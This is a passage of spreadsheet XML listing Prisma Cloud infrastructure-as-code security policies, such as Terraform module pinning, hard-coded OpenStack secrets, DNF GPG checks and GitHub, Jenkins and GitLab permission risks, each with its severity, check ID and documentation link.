      <c r="W1007" t="inlineStr">
        <is>
          <t>Ensure VPC classic access is disabled</t>
        </is>
      </c>
      <c r="X1007" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ibm-policies/ibm-general-policies/bc-ibm-2-2</t>
        </is>
      </c>
      <c r="Y1007" t="inlineStr"/>
      <c r="Z1007" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["ibm_is_vpc"]}</t>
        </is>
      </c>
      <c r="AA1007" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1007" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1007" t="inlineStr">
        <is>
          <t>CKV2_IBM_2</t>
        </is>
      </c>
      <c r="AD1007" t="b">
        <v>1</v>
      </c>
      <c r="AE1007" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1007" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>6ce1ef6c-e94b-4464-8c20-eb35cea2a5d9</t>
        </is>
      </c>
      <c r="AI1007" t="inlineStr"/>
      <c r="AJ1007" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1007" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" t="inlineStr"/>
      <c r="B1008" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1008" s="2" t="inlineStr"/>
      <c r="D1008" t="inlineStr"/>
      <c r="E1008" t="inlineStr"/>
      <c r="F1008" t="inlineStr"/>
      <c r="G1008" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1008" t="inlineStr">
        <is>
          <t>IaC:General:module</t>
        </is>
      </c>
      <c r="K1008" t="inlineStr">
        <is>
          <t>Terraform module sources do not use a git url with a tag or commit hash revision</t>
        </is>
      </c>
      <c r="L1008" t="inlineStr"/>
      <c r="M1008" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1008" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1008" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1008" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1008" t="inlineStr"/>
      <c r="R1008" t="inlineStr"/>
      <c r="S1008" t="inlineStr"/>
      <c r="T1008" t="b">
        <v>0</v>
      </c>
      <c r="U1008" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1008" t="inlineStr">
        <is>
          <t>IaC:General:module</t>
        </is>
      </c>
      <c r="W1008" t="inlineStr">
        <is>
          <t>Terraform module sources do not use a git url with a tag or commit hash revision</t>
        </is>
      </c>
      <c r="X1008" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/supply-chain-policies/terraform-policies/ensure-terraform-module-sources-use-tag</t>
        </is>
      </c>
      <c r="Y1008" t="inlineStr"/>
      <c r="Z1008" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["module"]}</t>
        </is>
      </c>
      <c r="AA1008" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1008" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1008" t="inlineStr">
        <is>
          <t>CKV_TF_2</t>
        </is>
      </c>
      <c r="AD1008" t="b">
        <v>1</v>
      </c>
      <c r="AE1008" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1008" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>0c4f4a05-8ad2-42c1-9160-bc6df9b5ef8c</t>
        </is>
      </c>
      <c r="AI1008" t="inlineStr"/>
      <c r="AJ1008" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1008" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" t="inlineStr"/>
      <c r="B1009" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1009" s="2" t="inlineStr"/>
      <c r="D1009" t="inlineStr"/>
      <c r="E1009" t="inlineStr"/>
      <c r="F1009" t="inlineStr"/>
      <c r="G1009" t="b">
        <v>1</v>
      </c>
      <c r="H10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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1009" t="inlineStr">
        <is>
          <t>IaC:General:module</t>
        </is>
      </c>
      <c r="K1009" t="inlineStr">
        <is>
          <t>Terraform module sources do not use a git url with a commit hash revision</t>
        </is>
      </c>
      <c r="L1009" t="inlineStr"/>
      <c r="M1009" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1009" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1009" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1009" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1009" t="inlineStr"/>
      <c r="R1009" t="inlineStr"/>
      <c r="S1009" t="inlineStr"/>
      <c r="T1009" t="b">
        <v>0</v>
      </c>
      <c r="U1009" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1009" t="inlineStr">
        <is>
          <t>IaC:General:module</t>
        </is>
      </c>
      <c r="W1009" t="inlineStr">
        <is>
          <t>Terraform module sources do not use a git url with a commit hash revision</t>
        </is>
      </c>
      <c r="X1009" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/supply-chain-policies/terraform-policies/ensure-terraform-module-sources-use-git-url-with-commit-hash-revision</t>
        </is>
      </c>
      <c r="Y1009" t="inlineStr"/>
      <c r="Z1009" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["module"]}</t>
        </is>
      </c>
      <c r="AA1009" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1009" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1009" t="inlineStr">
        <is>
          <t>CKV_TF_1</t>
        </is>
      </c>
      <c r="AD1009" t="b">
        <v>1</v>
      </c>
      <c r="AE1009" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1009" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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09" t="inlineStr">
        <is>
          <t>b3dc074f-b894-4295-b724-06e12e5a9860</t>
        </is>
      </c>
      <c r="AI1009" t="inlineStr"/>
      <c r="AJ1009" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1009" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" t="inlineStr"/>
      <c r="B1010" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1010" s="2" t="inlineStr"/>
      <c r="D1010" t="inlineStr"/>
      <c r="E1010" t="inlineStr"/>
      <c r="F1010" t="inlineStr"/>
      <c r="G1010" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1010" t="inlineStr">
        <is>
          <t>IaC:General:openstack</t>
        </is>
      </c>
      <c r="K1010" t="inlineStr">
        <is>
          <t>OpenStack hard coded password, token, or application_credential_secret exists in provider</t>
        </is>
      </c>
      <c r="L1010" t="inlineStr"/>
      <c r="M1010" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1010" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1010" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1010" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1010" t="inlineStr"/>
      <c r="R1010" t="inlineStr"/>
      <c r="S1010" t="inlineStr"/>
      <c r="T1010" t="b">
        <v>0</v>
      </c>
      <c r="U1010" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1010" t="inlineStr">
        <is>
          <t>IaC:General:openstack</t>
        </is>
      </c>
      <c r="W1010" t="inlineStr">
        <is>
          <t>Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider</t>
        </is>
      </c>
      <c r="X1010" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/openstack-policies/openstack-secrets-policies/bc-openstack-1</t>
        </is>
      </c>
      <c r="Y1010" t="inlineStr"/>
      <c r="Z1010" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["openstack"]}</t>
        </is>
      </c>
      <c r="AA1010" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1010" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1010" t="inlineStr">
        <is>
          <t>CKV_OPENSTACK_1</t>
        </is>
      </c>
      <c r="AD1010" t="b">
        <v>1</v>
      </c>
      <c r="AE1010" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1010" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>75cca4c4-5009-4bdc-96fa-2489d870c4d0</t>
        </is>
      </c>
      <c r="AI1010" t="inlineStr"/>
      <c r="AJ1010" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1010" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" t="inlineStr"/>
      <c r="B1011" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1011" s="2" t="inlineStr"/>
      <c r="D1011" t="inlineStr"/>
      <c r="E1011" t="inlineStr"/>
      <c r="F1011" t="inlineStr"/>
      <c r="G1011" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1011" t="inlineStr">
        <is>
          <t>IaC:General:synapse-spark</t>
        </is>
      </c>
      <c r="K1011" t="inlineStr">
        <is>
          <t>Azure Synapse Spark Pool not using isolated compute</t>
        </is>
      </c>
      <c r="L1011" t="inlineStr"/>
      <c r="M1011" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1011" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1011" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1011" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1011" t="inlineStr"/>
      <c r="R1011" t="inlineStr"/>
      <c r="S1011" t="inlineStr"/>
      <c r="T1011" t="b">
        <v>0</v>
      </c>
      <c r="U1011" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1011" t="inlineStr">
        <is>
          <t>IaC:General:synapse-spark-pool</t>
        </is>
      </c>
      <c r="W1011" t="inlineStr">
        <is>
          <t>Ensure isolated compute is enabled for Synapse Spark pools</t>
        </is>
      </c>
      <c r="X1011" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-242</t>
        </is>
      </c>
      <c r="Y1011" t="inlineStr"/>
      <c r="Z1011" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["synapse_spark_pool"]}</t>
        </is>
      </c>
      <c r="AA1011" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1011" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1011" t="inlineStr">
        <is>
          <t>CKV_AZURE_242</t>
        </is>
      </c>
      <c r="AD1011" t="b">
        <v>1</v>
      </c>
      <c r="AE1011" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1011" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>727c6eb8-2516-43a2-8693-68e81da08258</t>
        </is>
      </c>
      <c r="AI1011" t="inlineStr"/>
      <c r="AJ1011" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1011" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" t="inlineStr"/>
      <c r="B1012" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1012" s="2" t="inlineStr"/>
      <c r="D1012" t="inlineStr"/>
      <c r="E1012" t="inlineStr"/>
      <c r="F1012" t="inlineStr"/>
      <c r="G1012" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1012" t="inlineStr">
        <is>
          <t>IaC:General:tasks.ansible.builtin.dnf,tasks.dnf</t>
        </is>
      </c>
      <c r="K1012" t="inlineStr">
        <is>
          <t>DNF usage of packages with untrusted or missing GPG signatures allowed</t>
        </is>
      </c>
      <c r="L1012" t="inlineStr"/>
      <c r="M1012" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1012" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1012" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1012" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1012" t="inlineStr"/>
      <c r="R1012" t="inlineStr"/>
      <c r="S1012" t="inlineStr"/>
      <c r="T1012" t="b">
        <v>0</v>
      </c>
      <c r="U1012" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1012" t="inlineStr">
        <is>
          <t>IaC:General:tasks.ansible.builtin.dnf,tasks.dnf</t>
        </is>
      </c>
      <c r="W1012" t="inlineStr">
        <is>
          <t>Ensure that packages with untrusted or missing GPG signatures are not used by dnf</t>
        </is>
      </c>
      <c r="X1012" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-general-policies/ansible-2-4</t>
        </is>
      </c>
      <c r="Y1012" t="inlineStr"/>
      <c r="Z1012" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["tasks.ansible.builtin.dnf","tasks.dnf"]}</t>
        </is>
      </c>
      <c r="AA1012" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1012" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1012" t="inlineStr">
        <is>
          <t>CKV2_ANSIBLE_4</t>
        </is>
      </c>
      <c r="AD1012" t="b">
        <v>1</v>
      </c>
      <c r="AE1012" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1012" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>04dec79a-f2e4-4493-a04d-964d3f0aabd1</t>
        </is>
      </c>
      <c r="AI1012" t="inlineStr"/>
      <c r="AJ1012" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1012" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" t="inlineStr"/>
      <c r="B1013" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1013" s="2" t="inlineStr"/>
      <c r="D1013" t="inlineStr"/>
      <c r="E1013" t="inlineStr"/>
      <c r="F1013" t="inlineStr"/>
      <c r="G1013" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1013" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1013" t="inlineStr">
        <is>
          <t>Permissive GitHub organization base permissions</t>
        </is>
      </c>
      <c r="L1013" t="inlineStr"/>
      <c r="M1013" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1013" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1013" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1013" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1013" t="inlineStr"/>
      <c r="R1013" t="inlineStr"/>
      <c r="S1013" t="inlineStr"/>
      <c r="T1013" t="b">
        <v>0</v>
      </c>
      <c r="U1013" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1013" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1013" t="inlineStr">
        <is>
          <t>Organization base permissions apply to all organization members when accessing any organization repository. Any permission besides None, potentially allows compromised accounts to be used by attackers to steal all code stored in the organization repositories. In addition, Read permissions and higher can potentially allow executing attacks against CI/CD pipelines by triggering builds based on forks containing malicious code.</t>
        </is>
      </c>
      <c r="X1013" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/perm-gh-org-baseperm</t>
        </is>
      </c>
      <c r="Y1013" t="inlineStr"/>
      <c r="Z1013" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1013" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1013" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1013" t="inlineStr"/>
      <c r="AD1013" t="b">
        <v>1</v>
      </c>
      <c r="AE1013" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1013" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>992dd4cf-6a41-4b9c-93e8-6319b3ccf623</t>
        </is>
      </c>
      <c r="AI1013" t="inlineStr"/>
      <c r="AJ1013" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1013" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" t="inlineStr"/>
      <c r="B1014" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1014" s="2" t="inlineStr"/>
      <c r="D1014" t="inlineStr"/>
      <c r="E1014" t="inlineStr"/>
      <c r="F1014" t="inlineStr"/>
      <c r="G1014" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1014" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1014" t="inlineStr">
        <is>
          <t>Jenkins provides full access to authenticated user accounts</t>
        </is>
      </c>
      <c r="L1014" t="inlineStr"/>
      <c r="M1014" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1014" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1014" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1014" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1014" t="inlineStr"/>
      <c r="R1014" t="inlineStr"/>
      <c r="S1014" t="inlineStr"/>
      <c r="T1014" t="b">
        <v>0</v>
      </c>
      <c r="U1014" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1014" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1014" t="inlineStr">
        <is>
          <t>Jenkins is configured to allow full access to all authenticated user accounts. Any user account that successfully logs in to the system is granted with full administrative permissions, providing abilities such as accessing secrets, creating, modifying and deleting pipelines, and managing user accounts. This permission model puts the system at risk, as any attacker that achieves access to the system automatically controls every part of it.</t>
        </is>
      </c>
      <c r="X1014" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-full-access-auth-useracc</t>
        </is>
      </c>
      <c r="Y1014" t="inlineStr"/>
      <c r="Z1014" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1014" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1014" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1014" t="inlineStr"/>
      <c r="AD1014" t="b">
        <v>1</v>
      </c>
      <c r="AE1014" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1014" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>cf160533-dcc2-4031-a915-ac3321e2f061</t>
        </is>
      </c>
      <c r="AI1014" t="inlineStr"/>
      <c r="AJ1014" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1014" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" t="inlineStr"/>
      <c r="B1015" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1015" s="2" t="inlineStr"/>
      <c r="D1015" t="inlineStr"/>
      <c r="E1015" t="inlineStr"/>
      <c r="F1015" t="inlineStr"/>
      <c r="G1015" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1015" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1015" t="inlineStr">
        <is>
          <t>GitHub inactive user account programmatic credentials</t>
        </is>
      </c>
      <c r="L1015" t="inlineStr"/>
      <c r="M1015" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1015" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1015" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1015" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1015" t="inlineStr"/>
      <c r="R1015" t="inlineStr"/>
      <c r="S1015" t="inlineStr"/>
      <c r="T1015" t="b">
        <v>0</v>
      </c>
      <c r="U1015" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1015" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1015" t="inlineStr">
        <is>
          <t>GitHub user account programmatic credentials including personal access tokens (PAT) and SSH keys authorized by SAML SSO, are inactive for more than 90 days. Although not in use, these credentials are still valid, enlarging the attack surface.</t>
        </is>
      </c>
      <c r="X1015" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-inactive-useracc-progr-cred</t>
        </is>
      </c>
      <c r="Y1015" t="inlineStr"/>
      <c r="Z1015" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1015" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1015" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1015" t="inlineStr"/>
      <c r="AD1015" t="b">
        <v>1</v>
      </c>
      <c r="AE1015" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1015" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>647b1914-4001-4b65-8ec7-c6f7dd57c0a8</t>
        </is>
      </c>
      <c r="AI1015" t="inlineStr"/>
      <c r="AJ1015" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1015" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" t="inlineStr"/>
      <c r="B1016" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1016" s="2" t="inlineStr"/>
      <c r="D1016" t="inlineStr"/>
      <c r="E1016" t="inlineStr"/>
      <c r="F1016" t="inlineStr"/>
      <c r="G1016" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1016" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1016" t="inlineStr">
        <is>
          <t>Excessive user permissions to a GitLab project</t>
        </is>
      </c>
      <c r="L1016" t="inlineStr"/>
      <c r="M1016" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1016" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1016" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1016" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1016" t="inlineStr"/>
      <c r="R1016" t="inlineStr"/>
      <c r="S1016" t="inlineStr"/>
      <c r="T1016" t="b">
        <v>0</v>
      </c>
      <c r="U1016" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1016" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1016" t="inlineStr">
        <is>
          <t>A user with 'write' permissions to a project who has not performed any actions requiring write permissions for more than 90 days, may not require these permissions. This poses a threat, as attackers who gain control of a user account can access the project which the user potentially should not have 'write' permissions to (as they are not active in the project), thereby enlarging the surface of the attack.</t>
        </is>
      </c>
      <c r="X1016" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-excessive-app-permissions</t>
        </is>
      </c>
      <c r="Y1016" t="inlineStr"/>
      <c r="Z1016" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1016" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1016" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1016" t="inlineStr"/>
      <c r="AD1016" t="b">
        <v>1</v>
      </c>
      <c r="AE1016" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1016" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>7bb26db4-91c5-4afb-b0fe-57df4251640d</t>
        </is>
      </c>
      <c r="AI1016" t="inlineStr"/>
      <c r="AJ1016" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1016" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" t="inlineStr"/>
      <c r="B1017" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1017" s="2" t="inlineStr"/>
      <c r="D1017" t="inlineStr"/>
      <c r="E1017" t="inlineStr"/>
      <c r="F1017" t="inlineStr"/>
      <c r="G1017" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1017" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1017" t="inlineStr">
        <is>
          <t>Any organization member in GitHub can create internal repositories</t>
        </is>
      </c>
      <c r="L1017" t="inlineStr"/>
      <c r="M1017" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1017" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1017" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1017" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1017" t="inlineStr"/>
      <c r="R1017" t="inlineStr"/>
      <c r="S1017" t="inlineStr"/>
      <c r="T1017" t="b">
        <v>0</v>
      </c>
      <c r="U1017" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1017" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1017" t="inlineStr">
        <is>
